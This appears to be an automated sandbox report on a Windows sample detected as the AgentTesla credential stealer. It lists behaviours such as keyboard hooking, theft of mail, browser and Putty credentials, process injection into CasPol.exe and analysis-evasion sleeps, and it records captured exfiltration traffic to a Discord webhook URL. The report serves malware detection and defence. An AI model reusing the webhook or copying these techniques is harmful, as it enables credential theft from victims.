Windows Analysis Report
e-dekont-20230207.exe

Overview

General Information

Sample Name: e-dekont-20230207.exe
Analysis ID: 800710
MD5: 2fbaa4d917cce04617f24f87309286d6
SHA1: 7480ce7aebd7f59da7d6bd4f9eb7bba0efe05f97
SHA256: 91eb17a8906ebbe9c50ef6a509e80133fd3322aec9b84e04cc5925992235c17e
Tags: exe, geo, TUR

Detection

Detection: AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • e-dekont-20230207.exe (PID: 6072 cmdline: C:\Users\user\Desktop\e-dekont-20230207.exe MD5: 2FBAA4D917CCE04617F24F87309286D6)
    • CasPol.exe (PID: 6100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup
No configs have been found
Yara matches:
Source | Rule | Description | Author | Strings
00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: CasPol.exe PID: 6100 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: CasPol.exe PID: 6100 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

No Sigma rule has matched

Snort IDS alert:
        Timestamp: 02/07/23-18:31:33.991128
        Source IP: 192.168.2.5
        Destination IP: 162.159.128.233
        Source Port: 49690
        Destination Port: 443
        SID: 2851779
        Protocol: TCP
        Classtype: A Network Trojan was detected


        AV Detection

        Source: e-dekont-20230207.exe | ReversingLabs: Detection: 25%
        Source: e-dekont-20230207.exe | Joe Sandbox ML: detected
        Source: unknown | HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49689 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49690 version: TLS 1.2
        Source: e-dekont-20230207.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: FUCKYOU.pdb source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: MPOIn6t.pdb source: e-dekont-20230207.exe

        Networking

        Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49690 -> 162.159.128.233:443
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | DNS query: name: api.ipify.org
        Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox View | IP Address: 162.159.128.233
        Source: global traffic | HTTP traffic detected:
            GET / HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
            Host: api.ipify.org
            Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected:
            POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1
            Content-Type: multipart/form-data; boundary=----------0d40611c92ae4655a6dec63fbd8447e1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
            Host: discord.com
            Content-Length: 1224
            Expect: 100-continue
            Connection: Keep-Alive
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49689
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49690
        Source: unknown | Network traffic detected: HTTP traffic on port 49689 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 443
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Tue, 07 Feb 2023 17:31:34 GMT
            Content-Type: application/json
            Content-Length: 45
            Connection: close
            set-cookie: __dcfduid=444c6840a70d11ed8760e6ba40672d66; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            Via: 1.1 google
            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Egxqsltc4qolLS4uzBaoE9%2FLaswRMsv8abKbQSPxREWUfQSPaTwB7kb7z0WOBsXz71TuPG8StdDXxsdUAHgNvhn4re6poX%2Bxo7O3WpOD0mQMHdrmzCmF8EGKAI5p"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            X-Content-Type-Options: nosniff
            Set-Cookie: __sdcfduid=444c6840a70d11ed8760e6ba40672d66dd69c8ba71cb11fcdcb8dbf0ca98829aacc0c779c3c769b75f558a3581eb9a0f; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
            Set-Cookie: __cfruid=e3626c59acba08201b37fef2fc963ccf5c710641-1675791094; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Server: cloudflare
            CF-RAY: 795ddc215dd0368a-FRA

            {"message": "Unknown Webhook", "code": 10015}
        Source: CasPol.exe, 00000001.00000003.312705815.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.577672379.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.312026803.0000000005BB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com4Dp
        Source: unknown | HTTP traffic detected:
            POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1
            Content-Type: multipart/form-data; boundary=----------0d40611c92ae4655a6dec63fbd8447e1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
            Host: discord.com
            Content-Length: 1224
            Expect: 100-continue
            Connection: Keep-Alive
        Source: unknown | DNS traffic detected: queries for: api.ipify.org

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_04DAA008
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_04DA9CC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_04DAA8D8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_04DAC898
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_063782BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_063701A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_063729EC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06371730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06371760
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0637BFF9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06373858
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_064DCDC8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_064D1848
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_064DA5DC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0687E0D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0687B0E8
        Source: e-dekont-20230207.exe | Static PE information: No import functions for PE file found
        Source: e-dekont-20230207.exe, 00000000.00000002.305649698.000000000106C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMPOIn6t.exe0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.306294096.00000000133F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.305766749.00000000015E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe | Binary or memory string: OriginalFilenameMPOIn6t.exe0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Users\user\Desktop\e-dekont-20230207.exe C:\Users\user\Desktop\e-dekont-20230207.exe
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230207.exe.log
        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
        Source: e-dekont-20230207.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | Cryptographic APIs: 'CreateDecryptor'
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | Cryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | Cryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | Cryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | Cryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | Cryptographic APIs: 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, a/an2.cs | Cryptographic APIs: 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, a/aN1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
        Source: 1.2.CasPol.exe.400000.0.unpack, a/aH1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: e-dekont-20230207.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: e-dekont-20230207.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: e-dekont-20230207.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

        Data Obfuscation

        Source: e-dekont-20230207.exe, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs | .Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs | .Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs | .Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_04DA0007 push edi; retf 1_2_04DA0016
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_064DEC72 push es; ret 1_2_064DEC80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06871E87 push FFFFFF8Bh; iretd 1_2_06871E8B
        Source: e-dekont-20230207.exe | Static PE information: 0x9521C718 [Wed Apr 14 13:14:00 2049 UTC]
        Source: initial sample | Static PE information: section name: .text entropy: 7.972775066304571
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | High entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | High entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | High entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe TID: 6092 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2280 | Thread sleep count: 9641 > 30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -21213755684765971s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1200000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1199750s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1199563s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1199390s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1199281s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1199155s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198980s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198859s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198750s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198637s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198515s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198404s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198293s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198186s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198078s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197963s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197843s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197734s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197625s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197516s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197405s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197280s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197162s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196891s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196779s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196638s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196531s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196422s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196309s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196203s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196093s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1195984s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1195875s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1195765s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1195656s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1195547s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1195432s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1195312s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1195203s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1195078s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1194953s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1194843s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1194734s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1194625s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1194499s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1194391s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1194279s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1194172s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1194062s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1193931s >= -30000s
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1200000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1199750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1199563
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1199390
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1199281
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1199155
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1198980
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1198859
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1198750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1198637
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1198515
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1198404
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1198293
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 1198186
